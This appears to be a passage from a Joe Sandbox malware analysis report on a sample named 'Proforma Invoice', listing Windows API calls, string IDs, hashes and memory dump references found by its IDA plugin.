                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ColorLongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 259745315-0
                                                                                                • Opcode ID: 0ecfd60732a3be62ad838861bd1b99c1fdfccad9259e27469112fb0b8175209e
                                                                                                • Instruction ID: eb27f88ede5b7d72a9b58479b286f5d3fc127472e5f35429b3ebd978b2b36bb0
                                                                                                • Opcode Fuzzy Hash: 0ecfd60732a3be62ad838861bd1b99c1fdfccad9259e27469112fb0b8175209e
                                                                                                • Instruction Fuzzy Hash: 7B419031480145DBDB216F2CDC98BF93B67EB07321F2482A5FE658A2E5C7358D42DB25
                                                                                                APIs
                                                                                                • CharLowerBuffW.USER32(?,?,0072F910), ref: 0070A90B
                                                                                                • GetDriveTypeW.KERNEL32(00000061,007589A0,00000061), ref: 0070A9D5
                                                                                                • _wcscpy.LIBCMT ref: 0070A9FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                • API String ID: 2820617543-1000479233
                                                                                                • Opcode ID: 99b44f8bf5e64b5c957302e6207331a8f78199c0d83a71f3105a2f99727b4726
                                                                                                • Instruction ID: c5a64604aa9866af053bd0e05e37fdfbc2240980bba0030bdb4db810cdb85f78
                                                                                                • Opcode Fuzzy Hash: 99b44f8bf5e64b5c957302e6207331a8f78199c0d83a71f3105a2f99727b4726
                                                                                                • Instruction Fuzzy Hash: 61518E71218301EBC740EF14C892AAFB7E6EF85304F104A2DF996572D2DB75AD09CA93
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __i64tow__itow__swprintf
                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                • API String ID: 421087845-2263619337
                                                                                                • Opcode ID: e100caf0fff52fae52827071774d480e681654e2290d13b681c19f12951ecb3f
                                                                                                • Instruction ID: 6b56174c6c319b142b58e0f724947edafdbcf1f7b4c7f478884f258aedb48cde
                                                                                                • Opcode Fuzzy Hash: e100caf0fff52fae52827071774d480e681654e2290d13b681c19f12951ecb3f
                                                                                                • Instruction Fuzzy Hash: 3941B8719102059FEB24EF34D841EB673EAEF46300F30486EE54AD7391EA75AD42CB21
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0072716A
                                                                                                • CreateMenu.USER32 ref: 00727185
                                                                                                • SetMenu.USER32(?,00000000), ref: 00727194
                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00727221
                                                                                                • IsMenu.USER32(?), ref: 00727237
                                                                                                • CreatePopupMenu.USER32 ref: 00727241
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0072726E
                                                                                                • DrawMenuBar.USER32 ref: 00727276
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                • String ID: 0$F
                                                                                                • API String ID: 176399719-3044882817
                                                                                                • Opcode ID: c103e6a73c56ee2daa12fa7ed110bf951f8b855849d69295fcd6f0e6f39713a6
                                                                                                • Instruction ID: 71998ffa05ccddf0c0b014b06e7e62701e4468ba16a7718652b209da2763a42a
                                                                                                • Opcode Fuzzy Hash: c103e6a73c56ee2daa12fa7ed110bf951f8b855849d69295fcd6f0e6f39713a6
                                                                                                • Instruction Fuzzy Hash: 4A416874A01219EFDB24DF64EA84E9ABBF5FF48310F144028F945A7360D739A920CFA4
                                                                                                APIs
                                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0072755E
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00727565
                                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00727578
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00727580
                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0072758B
                                                                                                • DeleteDC.GDI32(00000000), ref: 00727594
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0072759E
                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007275B2
                                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007275BE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                • String ID: static
                                                                                                • API String ID: 2559357485-2160076837
                                                                                                • Opcode ID: 180eeac54ba2c0b046ce3294932e2619a280a6e536052575e0fd65181844042d
                                                                                                • Instruction ID: 1717e8a9eab785bfaa0c83b41ae800dbf665f570241e130a8feace22abd731e4
                                                                                                • Opcode Fuzzy Hash: 180eeac54ba2c0b046ce3294932e2619a280a6e536052575e0fd65181844042d
                                                                                                • Instruction Fuzzy Hash: 8C318171104225BBDF259F65EC09FDB7B79FF09720F114228FA15961A0C739D822DBA8
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 006C6E3E
                                                                                                  • Part of subcall function 006C8B28: __getptd_noexit.LIBCMT ref: 006C8B28
                                                                                                • __gmtime64_s.LIBCMT ref: 006C6ED7
                                                                                                • __gmtime64_s.LIBCMT ref: 006C6F0D
                                                                                                • __gmtime64_s.LIBCMT ref: 006C6F2A
                                                                                                • __allrem.LIBCMT ref: 006C6F80
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006C6F9C
                                                                                                • __allrem.LIBCMT ref: 006C6FB3
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006C6FD1
                                                                                                • __allrem.LIBCMT ref: 006C6FE8
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006C7006
                                                                                                • __invoke_watson.LIBCMT ref: 006C7077
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                • String ID:
                                                                                                • API String ID: 384356119-0
                                                                                                • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                • Instruction ID: b7d26644809999fab5c7cb5de4dd5a68b4f4b02fa197a74400dd69ef91d3ae16
                                                                                                • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                • Instruction Fuzzy Hash: 5971E7B6A04717ABD714AE69DC41FBAB3AAEF04724F14822EF514D7381EB70DD408B94
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00702542
                                                                                                • GetMenuItemInfoW.USER32(00765890,000000FF,00000000,00000030), ref: 007025A3
                                                                                                • SetMenuItemInfoW.USER32(00765890,00000004,00000000,00000030), ref: 007025D9
                                                                                                • Sleep.KERNEL32(000001F4), ref: 007025EB
                                                                                                • GetMenuItemCount.USER32(?), ref: 0070262F
                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0070264B
                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00702675
                                                                                                • GetMenuItemID.USER32(?,?), ref: 007026BA
                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00702700
                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00702714
                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00702735
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                • String ID:
                                                                                                • API String ID: 4176008265-0
                                                                                                • Opcode ID: d73519923d1d794841178ca7632458a821c112c8087bda32530bdef9ee0fa4c1
                                                                                                • Instruction ID: ed7229a9fc155f4fa671ad76fcbfd9723aa0f5fbfb1af3c64788269c2968696d
                                                                                                • Opcode Fuzzy Hash: d73519923d1d794841178ca7632458a821c112c8087bda32530bdef9ee0fa4c1
                                                                                                • Instruction Fuzzy Hash: 716183B2500249EFDB21CF64CC8CDBE7BF8EB41304F144269E94193292D779AD16DB25
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00726FA5
                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00726FA8
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00726FCC
                                                                                                • _memset.LIBCMT ref: 00726FDD
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00726FEF
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00727067
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                • String ID:
                                                                                                • API String ID: 830647256-0
                                                                                                • Opcode ID: 60dc14da7c55430b8802bf54c98074cb083482ac6f2a34739e3b9c8dd89fae06
                                                                                                • Instruction ID: dc152924ed8df719459bbf3f16fe6dca37678cbb33ac1db33c5ec0622a5ceb06
                                                                                                • Opcode Fuzzy Hash: 60dc14da7c55430b8802bf54c98074cb083482ac6f2a34739e3b9c8dd89fae06
                                                                                                • Instruction Fuzzy Hash: 7A618A70900218AFDB20DFA4DD81EEE77F8EF49710F10415AFA15AB2A1C778AD45DBA0
                                                                                                APIs
                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006F6BBF
                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 006F6C18
                                                                                                • VariantInit.OLEAUT32(?), ref: 006F6C2A
                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 006F6C4A
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 006F6C9D
                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 006F6CB1
                                                                                                • VariantClear.OLEAUT32(?), ref: 006F6CC6
                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 006F6CD3
                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006F6CDC
                                                                                                • VariantClear.OLEAUT32(?), ref: 006F6CEE
                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006F6CF9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                • String ID:
                                                                                                • API String ID: 2706829360-0
                                                                                                • Opcode ID: 3e3c1bb22bd8d20b8fad88ebd035a6eac9f2f44fda0cd6a4a84fe28609d30a98
                                                                                                • Instruction ID: 79a6ff178a25e0ec1f13c1ca41f6847e6f81c02279bd2511cbcdd5eb4843be62
                                                                                                • Opcode Fuzzy Hash: 3e3c1bb22bd8d20b8fad88ebd035a6eac9f2f44fda0cd6a4a84fe28609d30a98
                                                                                                • Instruction Fuzzy Hash: 45413075A0011D9FCF10EF64D8449AEBBBAEF08354F008079FA55A7261CB74AA46CFA4
                                                                                                APIs
                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00715793
                                                                                                • inet_addr.WSOCK32(?,?,?), ref: 007157D8
                                                                                                • gethostbyname.WSOCK32(?), ref: 007157E4
                                                                                                • IcmpCreateFile.IPHLPAPI ref: 007157F2
                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00715862
                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00715878
                                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007158ED
                                                                                                • WSACleanup.WSOCK32 ref: 007158F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                • String ID: Ping
                                                                                                • API String ID: 1028309954-2246546115
                                                                                                • Opcode ID: 61f2ec7922f53cd07cb9053fd6b662fc226a2d652fcfa90bc10b844f0bfc3a43
                                                                                                • Instruction ID: bb7886832de6f4c521a8c1b20771fa2f8b949b6a5886fcfc1acc81820e234d75
                                                                                                • Opcode Fuzzy Hash: 61f2ec7922f53cd07cb9053fd6b662fc226a2d652fcfa90bc10b844f0bfc3a43
                                                                                                • Instruction Fuzzy Hash: 2E517C31600600DFD724EF28C845BAAB7E4EB85710F148969F956EB2E1DB78ED408B56
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0070B4D0
                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0070B546
                                                                                                • GetLastError.KERNEL32 ref: 0070B550
                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0070B5BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                • API String ID: 4194297153-14809454
                                                                                                • Opcode ID: 95fb543bb145a7e3cc326e61b278209cb3ba46e36eb24bb254f56affdd336381
                                                                                                • Instruction ID: 1f24da5a4d91dd15a4657cb7be836bd1ab39ad31383b76e5666927fdc9ba1f94
                                                                                                • Opcode Fuzzy Hash: 95fb543bb145a7e3cc326e61b278209cb3ba46e36eb24bb254f56affdd336381
                                                                                                • Instruction Fuzzy Hash: 5D319E75A00209DFCB50EB68CC85AAE77F4EF05301F1042AAF901AB2D1DB799A12CB51
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                  • Part of subcall function 006FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006FAABC
                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006F9014
                                                                                                • GetDlgCtrlID.USER32 ref: 006F901F
                                                                                                • GetParent.USER32 ref: 006F903B
                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 006F903E
                                                                                                • GetDlgCtrlID.USER32(?), ref: 006F9047
                                                                                                • GetParent.USER32(?), ref: 006F9063
                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 006F9066
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 1536045017-1403004172
                                                                                                • Opcode ID: 58c83e566b064bd6c2e9d464bd70adafb658d7ae21a7010ee10c0c732af951bb
                                                                                                • Instruction ID: 555338873b7c93458b4a1ea6e69f2db4264cf7b70f0c5ba8677e05e2211d73b0
                                                                                                • Opcode Fuzzy Hash: 58c83e566b064bd6c2e9d464bd70adafb658d7ae21a7010ee10c0c732af951bb
                                                                                                • Instruction Fuzzy Hash: D521B674A00108BFDF15ABA0CC85EFEBB76EF49310F10416DFA61972A1DF795819DA24
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                  • Part of subcall function 006FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006FAABC
                                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006F90FD
                                                                                                • GetDlgCtrlID.USER32 ref: 006F9108
                                                                                                • GetParent.USER32 ref: 006F9124
                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 006F9127
                                                                                                • GetDlgCtrlID.USER32(?), ref: 006F9130
                                                                                                • GetParent.USER32(?), ref: 006F914C
                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 006F914F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 1536045017-1403004172
                                                                                                • Opcode ID: e7aad060b5eef7520a97e78ea2fc0e39e4f1abe8ae4675897b67d08f75b9309f
                                                                                                • Instruction ID: f510150f1c5244fba18a5b7e78ab4b9d098abcea4da864f2caf45770222aac27
                                                                                                • Opcode Fuzzy Hash: e7aad060b5eef7520a97e78ea2fc0e39e4f1abe8ae4675897b67d08f75b9309f
                                                                                                • Instruction Fuzzy Hash: BC219574A00108BBDF15EBA4CC85FFEBB76EF49300F10412AFA51972A1DB79585ADB24
                                                                                                APIs
                                                                                                • GetParent.USER32 ref: 006F916F
                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 006F9184
                                                                                                • _wcscmp.LIBCMT ref: 006F9196
                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006F9211
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                • API String ID: 1704125052-3381328864
                                                                                                • Opcode ID: c77d2433b36ee3216a0315a78e3b4c4892d9a46028b7ccea76216a2d44f334a7
                                                                                                • Instruction ID: 82ee3c534a2a1ba1f7fe747f21de585e4c84c185e02e0eceaa35f80e3029d650
                                                                                                • Opcode Fuzzy Hash: c77d2433b36ee3216a0315a78e3b4c4892d9a46028b7ccea76216a2d44f334a7
                                                                                                • Instruction Fuzzy Hash: F5110D7A14830BB5FA152624FC16FF7379EDB15721B20002AFE00A41E1EF9569565578
                                                                                                APIs
                                                                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00707A6C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafeVartype
                                                                                                • String ID:
                                                                                                • API String ID: 1725837607-0
